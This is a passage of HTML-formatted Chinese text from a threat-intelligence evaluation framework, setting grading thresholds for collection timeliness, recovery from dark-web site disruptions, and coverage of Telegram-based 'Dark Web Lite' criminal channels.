solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="384" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="80" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="104" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报采集时效性</span></span></p></td><td data-colwidth="384" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源：Tier1 无，Tier2 无，Tier3 &lt; 24小时</span></span></p></td><td data-colwidth="80" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="384" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源：Tier1 无，Tier2 &lt; 6小时，Tier3 &lt; 12小时</span></span></p></td><td data-colwidth="80" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="384" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源：Tier1 &lt; 6小时，Tier2 &lt; 2小时，Tier3 &lt; 1小时</span></span></p></td><td data-colwidth="80" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对不同难度威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">响应速度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其中 Tier 1 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，Tier 2 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中高对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，Tier 3 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中低对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过量化采集延迟，可客观反映引擎在实战环境下的情报获取及时性，为后续风险预警、事件研判和应急处置争取关键时间窗口，提供重要时效支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">3.5.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">暗网波动对抗能力</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.5.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网波动对抗能力是 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web 威胁源采集</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 的重要保障性指标。其核心设计目的在于评估在面对威胁源波动时的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">快速恢复能力与应急适配能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，确保采集工作不中断、情报获取不脱节。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 中的高价值威胁源易受多种因素影响产生波动，包括</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">执法打击行动、站点查封、域名 / 地址更换、防护机制升级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等，这些因素均可能直接导致采集中断。若缺乏有效的波动对抗能力，将可能出现长时间无法获取暗网情报的情况，进而影响相关单位对暗网威胁的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时发现、快速响应与风险处置</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，导致威胁预警滞后、处置被动。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标通过量化从发现威胁源波动到恢复稳定采集的时间，客观反映在复杂对抗环境下的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为暗网情报采集工作的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性与可靠性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供重要技术支撑，保障情报采集工作的连续性与实战可用性。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.5.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard》（2025）中“</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Source Collection（来源采集能力）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">”的评估维度，并结合Traditional Dark Web威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实际波动特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 中的高价值威胁源具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">较高的波动性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，经常因</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">执法行动、站点查封、地址更换、防护升级或站点主动迁移</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等因素导致</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集中断</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。这种波动直接影响情报采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">连续性和及时性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。因此，本框架以“发现波动至恢复稳定采集的时间”</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">作为主要量化标准</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，并按照</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">恢复速度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">划分为三个等级。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">优秀级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求在</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">48 小时</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">内恢复稳定采集，体现具备较强的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动发现和新源适配能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">良好级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求在</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">7 天内</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">恢复，表明具备基本的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">波动应对机制</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求在</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">30 天内</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">恢复或具备一定处置措施，达到</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最低可用要求</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过这种分级设计，本指标能够客观反映在面对暗网威胁源波动时的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">恢复能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为评估采集</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性和实战韧性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供可靠依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.5.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网波动对抗能力以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">发现波动至恢复稳定采集的时间</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="163" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="278" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="127" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="163" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网波动对抗能力</span></span></p></td><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">发现波动至恢复 &lt; 30天</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">发现波动至恢复 &lt; 7天</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">发现波动至恢复 &lt; 48小时</span></span></p></td><td data-colwidth="127" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估在面对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">执法行动、地址更换、防护升级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等威胁源波动情况下的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">恢复能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化恢复时间，可客观反映在复杂对抗环境下的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续采集韧性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为情报采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性和长期可用性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供重要技术支撑。</span></span></p><h1 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">第四章 </span></span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf=""><span textstyle="" style="font-size: 18px;">Dark Web Lite 威胁源采集能力</span></span></strong></span></h1><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 是以加密通信工具为依托、由封闭社群与私密频道 / 群组构成的次生地下威胁生态，无需依托传统匿名网络即可接入，兼具开放接入与邀请制封闭运行双重形态，具有传播速率快、地址更迭频繁、结构动态演化、总体规模庞大等典型特征。该生态是当前暗网环境中数据泄露交易、勒索通告发布、入侵工具流转、侵公查档活动、黑灰产协同作业与实时情报交互的主要承载空间，在网络犯罪产业化链条中占据高频交互、快速扩散的核心地位。本章立足该生态的动态化、规模化、高对抗性特征，从威胁源采集广度、威胁源内容解析度、威胁源采集规模、采集效果优化效率四个维度，构建 Dark Web Lite 威胁源采集能力量化评估体系，用以全面评估针对加密社群类威胁情报的全域覆盖能力、深度解析能力、规模化获取能力与快速适配能力，为暗网情报全链路采集体系提供轻量化地下生态的能力支撑与可量化评估依据。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">4.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">威胁源采集广度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度是</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估网络安全相关网络犯罪生态中 Dark Web Lite 威胁源的覆盖范围与覆盖规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，最大限度降低威胁情报漏检风险，保障情报监测的全面性与稳定性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Dark Web Lite 生态中的高价值威胁情报主要依托</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">群组与私密频道</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展传播与交易活动。若采集广度不足，则无法实现对足量威胁源的有效覆盖，极易造成</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要数据泄露、IAB 交易、窃密日志</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等关键情报漏报，直接导致相关机构在威胁发生早期阶段难以实现有效发现与快速响应，错失风险处置的最佳时机。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，威胁源采集广度</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接决定能否全面、及时发现 Dark Web Lite 生态内的网络安全相关威胁活动</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续情报分析、风险预警与应急处置提供充足、可靠的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Dark Web Lite 威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的实际分布特征与采集需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Telegram 作为 Dark Web Lite 的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">主要承载载体</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，其社群与频道总体规模极为庞大，全球范围内总量已达数亿级别。但聚焦至网络安全相关网络犯罪生态（含数据泄露贩卖、勒索通告、IAB 交易、窃密日志等）的有效威胁源，其实际数量远低于总体规模。依据行业研究成果与实战监测数据，该领域内具备持续活跃属性的群组与频道数量，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">总量处于数千至数万区间</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源群组和频道数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，用以评估对 Dark Web Lite 威胁源的采集覆盖广度。指标分级设计综合考虑三大核心要素：一是 Dark Web Lite 生态中网络安全相关威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">真实规模分布</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；二是不同能力层级在覆盖范围上的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">差异化表现</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">；三是该生态所具备的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高波动、快速迭代特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过设定科学合理的量化阈值，保障指标兼具科学性与可操作性，能够客观体现引擎在采集广度层面的实际能力差距。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标主要参考依据包括：Flare Systems《Telegram Cybercrime Ecosystem Report》（2025）、Chainalysis《Crypto Crime Report 2025》中关于地下通讯社群威胁源规模的测算与统计数据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">4.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">威胁源群组和频道数量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="163" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="278" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="127" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="163" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">威胁源采集广度</span></span></p></td><td data-colwidth="278" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span 